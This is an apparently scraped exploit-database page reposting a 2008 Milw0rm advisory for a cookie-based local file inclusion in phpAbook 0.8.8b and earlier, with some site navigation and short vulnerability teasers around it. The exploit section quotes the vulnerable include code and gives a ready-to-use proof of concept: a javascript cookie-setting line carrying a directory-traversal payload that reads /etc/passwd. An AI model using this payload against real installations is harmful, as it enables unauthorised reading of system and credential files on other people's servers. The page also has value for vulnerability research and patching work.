|
 |
| SecurityReason | ||
| WLB | ||
| RSS | ||
| Corporate | ||
| Services | ||
| Note | ||
If you have found a vulnerability, please send to our SecurityAlert Database : |
||
| Details : ExploitAlert | ||
 ExploitAlert : 4852 Milw0rm ID : 6679 Credit : JosS Date : 7.10.2008 Exploit Code : # phpAbook <= 0.8.8b (COOKIE) Local File Inclusion Vulnerability # url: http://sourceforge.net/projects/phpabook/ # # Author: JosS # mail: sys-project[at]hotmail[dot]com # site: http://spanish-hackers.com # team: Spanish Hackers Team - [SHT] # # This was written for educational purpose. Use it at your own risk. # Author will be not responsible for any damage. # # *Requirements: magic_quotes_gpc = Off vuln file: include/config.inc.php vuln code: x: >... 61: if (isset($HTTP_COOKIE_VARS["userInfo"]) && $HTTP_COOKIE_VARS["userInfo"] != "") { $userArray = explode(" ", $HTTP_COOKIE_VARS["userInfo"]); $userName = $userArray[0]; $userID = $userArray[1]; $userLang = $userArray[2]; include("include/lang/$userLang/inc.messages.php"); 67: } x: <... Proof of Concept (function 'explode' PHP): [0] = JosS; [1] = JosS; [2] = ../../../../etc/passwd%00; ---> INCLUDE exploit: javascript:document.cookie="userInfo=JosS JosS ../../../../etc/passwd%00; path=/"; Ingenious work :D |
||
| Alert | ||
*BSD libc (strfmon) Multiple vulnerabilities
Maksymilian Arciemowicz discovered a Integer Overflow vulnerability in the libc library "strfmon()" function.A vulnerability could allow an attacker who successfully exploits this vulnerability to take control of the affected *BSD systems. |
||
| Apache |  |
|
» Apache Tomcat <= |
||
| PHP | |
|
» PHP 5.2.5 and prior : |
||
- 2008-03-25| Copyright © SecurityReason. All Rights Reserved. |